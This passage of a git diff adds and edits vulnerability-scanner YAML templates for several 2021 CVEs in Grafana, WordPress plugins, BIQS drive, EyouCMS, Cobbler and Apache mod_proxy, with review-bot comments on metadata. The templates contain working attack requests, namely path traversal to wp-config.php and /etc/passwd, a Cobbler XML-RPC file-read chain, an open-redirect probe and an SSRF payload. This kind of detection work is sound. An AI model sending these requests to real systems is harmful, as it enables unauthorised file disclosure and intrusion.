reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - severity: critical - tags: cve,cve2021,grafana + - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 + - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ + remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 cve-id: CVE-2021-39226 - cwe-id: CWE-200 + cwe-id: CWE-287 + tags: cve,cve2021,grafana requests: - method: GET @@ -28,4 +31,6 @@ requests: - type: word words: - - '"isSnapshot":true' \ No newline at end of file + - '"isSnapshot":true' + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-39312.yaml b/cves/2021/CVE-2021-39312.yaml new file mode 100644 index 0000000000..00063e25cb --- /dev/null +++ b/cves/2021/CVE-2021-39312.yaml 
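Review bot: The new `remediation` line says the issue is `resolved in versions 8.1.6 and 7.5.11`, while the rewritten `description` above it says instances `up to 7.5.11 and 8.1.5` are affected — the 7.5.x bound contradicts itself across the two fields, and only one can be right (the 8.1.x pair is consistent). The same `remediation` value also lists `/api/snapshots/:key` twice and uses the plural `snapshots` where the description uses `/api/snapshot/:key`; the paths should be checked against the linked Grafana commit and written once each. The severity and CVSS change (`critical`/9.8 to `high`/7.3, `CWE-200` to `CWE-287`) is a substantive re-classification worth calling out in the commit message; the matcher hunk below only fixes the trailing newline.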
@@ -0,0 +1,42 @@ +id: CVE-2021-39312 + +info: + name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal + author: DhiyaneshDK + severity: high + description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file. + reference: + - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 + - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php + remediation: Fixed in version 2.2.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39312 + cwe-id: CWE-22,CWE-22 + tags: lfi,wp,wordpress,wp-plugin,unauth,lfr,cve,cve2021 + +requests: + - raw: + - | + POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml index 693e3bd541..220762d7e1 100644 --- a/cves/2021/CVE-2021-39316.yaml +++ b/cves/2021/CVE-2021-39316.yaml 
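Review bot: The `cwe-id: CWE-22,CWE-22` line repeats the same CWE; it should be `cwe-id: CWE-22`. The `name` also omits the platform prefix that the sibling new file in this commit uses (`WordPress Easy Social Icons Plugin < 3.0.9 - ...`), so `name: WordPress True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal` keeps the two consistent. The `tags` list mixes `wp` with `wordpress` and `lfi` with `lfr`; keeping one of each pair makes tag-based selection predictable.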
@@ -1,19 +1,21 @@ id: CVE-2021-39316 info: - name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download + name: Wordpress DZS Zoomsounds <= 6.50 - Arbitrary File Retrieval author: daffainfo severity: high - description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter. + description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using a directory traversal in the `link` parameter. reference: - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316 - tags: wordpress,cve2021,cve,lfi,wp-plugin + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39316 + - http://packetstormsecurity.com/files/165146/WordPress-DZS-Zoomsounds-6.45-Arbitrary-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2021-39316 cwe-id: CWE-22 + tags: wordpress,cve2021,cve,lfi,wp-plugin,zoomsounds requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2021/CVE-2021-39320.yaml b/cves/2021/CVE-2021-39320.yaml index 9c8808cd68..6e634f1073 100644 --- a/cves/2021/CVE-2021-39320.yaml +++ b/cves/2021/CVE-2021-39320.yaml 
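Review bot: The new `name` line says `<= 6.50` while the `description` in the same hunk says `The Zoomsounds plugin <= 6.45 for WordPress`, and the removed name said `< 6.50`; the bound has been changed from exclusive to inclusive and now disagrees with the description. Whichever bound the wpscan and wordfence references support, both fields should state it once, e.g. `name: WordPress DZS Zoomsounds <= 6.45 - Arbitrary File Retrieval`, which also fixes the `Wordpress` capitalisation to the form every other template in this commit uses. The regex hunk below (`root:.*:0:0:`) is the same tightening applied to CVE-2018-3760 and is fine.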
@@ -1,16 +1,17 @@ id: CVE-2021-39320 info: - name: underConstruction < 1.19 - Reflected Cross-Site Scripting + name: WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting author: dhiyaneshDK severity: medium - description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path. + description: The underConstruction plugin <= 1.18 for WordPress echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file. On certain configurations including Apache+modPHP, this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 tags: wordpress,xss,cve,cve2021,wp-plugin @@ -35,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39322.yaml b/cves/2021/CVE-2021-39322.yaml new file mode 100644 index 0000000000..80b3ada7a5 --- /dev/null +++ b/cves/2021/CVE-2021-39322.yaml 
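Review bot: The new name `WordPress underConstruction Plugin< 1.19 - Reflected Cross-Site Scripting` is missing the space before `<`; it should read `WordPress underConstruction Plugin < 1.19 - Reflected Cross-Site Scripting`. Nothing else in this hunk changes matching behaviour.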
@@ -0,0 +1,52 @@ +id: CVE-2021-39322 + +info: + name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. + reference: + - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39322 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 + - https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39322 + cwe-id: CWE-79 + tags: wordpress,cve,cve2021,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php//?page=cnss_social_icon_page HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39327.yaml b/cves/2021/CVE-2021-39327.yaml index b98d2b69b6..f78e4f755b 100644 --- a/cves/2021/CVE-2021-39327.yaml +++ b/cves/2021/CVE-2021-39327.yaml 
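Review bot: The `tags` line (`wordpress,cve,cve2021,wp-plugin,authenticated`) omits `xss` even though the template targets a reflected cross-site scripting issue; the sibling CVE-2021-39350 template in this change tags `xss`, so this one should read `tags: wordpress,cve,cve2021,wp-plugin,authenticated,xss`. As rendered here the body matcher's only word is the empty string `''` and the path `/wp-admin/admin.php//?page=cnss_social_icon_page` carries no probe; if that is what the file contains rather than markup lost in this listing, the word matcher is satisfied by any 200 text/html page after login and nothing proves that `PHP_SELF` is reflected. The injected string should appear in the request path and the same string should be the body word.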
@@ -9,12 +9,12 @@ info: - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 - tags: cve,cve2021,wordpress,exposures classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2021-39327 cwe-id: CWE-200 + tags: cve,cve2021,wordpress,exposures requests: - method: GET @@ -39,3 +39,5 @@ requests: part: header words: - 'text/plain' + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39350.yaml b/cves/2021/CVE-2021-39350.yaml new file mode 100644 index 0000000000..330eb99f1e --- /dev/null +++ b/cves/2021/CVE-2021-39350.yaml 
@@ -0,0 +1,54 @@ +id: CVE-2021-39350 + +info: + name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected Cross-Site Scripting + author: gy741 + severity: medium + description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727. + reference: + - https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 + - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39350 + cwe-id: CWE-79 + tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "

FV Player Stats

" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39433.yaml b/cves/2021/CVE-2021-39433.yaml new file mode 100644 index 0000000000..bbc07f241b --- /dev/null +++ b/cves/2021/CVE-2021-39433.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-39433 + +info: + name: BIQS IT Biqs-drive v1.83 Local File Inclusion + author: Veshraj + severity: high + description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user. + reference: + - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433 + - https://biqs-drive.be/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39433 + tags: lfi,biqsdrive,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml new file mode 100644 index 0000000000..4708455ae9 --- /dev/null +++ b/cves/2021/CVE-2021-39501.yaml 
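Review bot: The request `GET /wp-admin/admin.php?page=fv_player_stats&player_id=1` carries no probe in `player_id`, and the first entry under `words` is the empty string `""` as rendered; if the file really reads this way rather than losing markup in this listing, the template only shows that a logged-in user can load the stats page, not that `player_id` is echoed unescaped. The reflected string should be placed in `player_id` and be the first body word, with the page-title word kept as the second. The `name` also drops the version range that the description gives (7.5.0.727 - 7.5.2.727); carrying it in the name would match the other templates in this change.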
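Review bot: The classification block for CVE-2021-39433 has `cvss-metrics`, `cvss-score` and `cve-id` but no `cwe-id`, while the other path-traversal templates in this change (CVE-2021-39316, CVE-2021-40960) carry `cwe-id: CWE-22`; add `cwe-id: CWE-22` for consistency. The description's `exists in version BIQS IT Biqs-drive v1.83 and below` reads awkwardly and could be `exists in BIQS IT Biqs-drive v1.83 and below`. The `root:.*:0:0:` regex with a 200 status follows the convention used elsewhere in this change.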
@@ -0,0 +1,31 @@ +id: CVE-2021-39501 + +info: + name: EyouCMS 1.5.4 Open Redirect + author: 0x_Akoko + severity: medium + description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function. + reference: + - https://github.com/eyoucms/eyoucms/issues/17 + - https://www.cvedetails.com/cve/CVE-2021-39501 + - https://github.com/KietNA-HPT/CVE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-39501 + cwe-id: CWE-601 + tags: cve,cve2021,redirect,eyoucms,cms + +requests: + - method: GET + + path: + - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2021/CVE-2021-40323.yaml b/cves/2021/CVE-2021-40323.yaml new file mode 100644 index 0000000000..c4753930ea --- /dev/null +++ b/cves/2021/CVE-2021-40323.yaml 
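Review bot: There is a stray blank line between `- method: GET` and `path:` inside the request block, which no other template in this change has; drop it so `path:` follows `- method: GET` directly. The header-only `Location` regex is the usual shape for open-redirect templates in this repository, though a `Location` header on a non-3xx response would also satisfy it, so pairing it with a `type: status` matcher for `302` is worth considering if the application's actual redirect code is known.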
@@ -0,0 +1,99 @@ +id: CVE-2021-40323 + +info: + name: Cobbler <3.3.0 - Remote Code Execution + author: c-sh0 + severity: critical + description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. + reference: + - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 + - https://github.com/cobbler/cobbler/issues/2795 + - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-40323 + cwe-id: CWE-94 + tags: cve,cve2021,cobbler,rce + +requests: + - raw: + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + find_profile + + + + + + name + + * + + + + + + + + + - | + POST {{BaseURL}}/cobbler_api HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + generate_script + + + + {{profile}} + + + + + + + + + + /etc/passwd + + + + + + extractors: + - type: regex + name: profile + internal: true + group: 1 + regex: + - '(.*?)' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/xml' + + - type: regex + regex: + - "root:.*:0" + - "bin:.*:1" + - "nobody:.*:99" + condition: or + +# Enhanced by mp on 2022/05/02 diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml index 51d98bbad2..6d8f0e3541 100644 --- a/cves/2021/CVE-2021-40438.yaml +++ b/cves/2021/CVE-2021-40438.yaml 
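Review bot: Both raw request lines read `POST {{BaseURL}}/cobbler_api HTTP/1.1`, which expands to an absolute-form request-target while `Host: {{Hostname}}` is also sent; every other raw template in this change uses a path-only target, so these should be `POST /cobbler_api HTTP/1.1`. The body regexes `root:.*:0`, `bin:.*:1` and `nobody:.*:99` are looser than the `root:.*:0:0:` form the sibling file-read templates use; tightening at least the first to `root:.*:0:0:` reduces accidental matches. The XML-RPC bodies and the extractor regex `'(.*?)'` appear to have lost their markup in this listing, so the element wrapping captured by group 1 could not be reviewed. Since the probe reads `/etc/passwd` through `generate_script` rather than executing code, a sentence in the description saying the template confirms the underlying file-read primitive would help readers reconcile it with the `Remote Code Execution` name.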
@@ -1,30 +1,33 @@ id: CVE-2021-40438 info: - name: Apache <= 2.4.48 - Mod_Proxy SSRF + name: Apache <= 2.4.48 Mod_Proxy SSRF author: pdteam severity: critical - description: A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the remote user. + description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user. reference: - https://firzen.de/building-a-poc-for-cve-2021-40438 - https://httpd.apache.org/security/vulnerabilities_24.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40438 - tags: cve,cve2021,ssrf,apache,mod-proxy,oast + remediation: Upgrade to Apache version 2.4.49 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.00 + cvss-score: 9 cve-id: CVE-2021-40438 cwe-id: CWE-918 + tags: cve,cve2021,ssrf,apache,mod-proxy requests: - method: GET path: - - '{{BaseURL}}/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
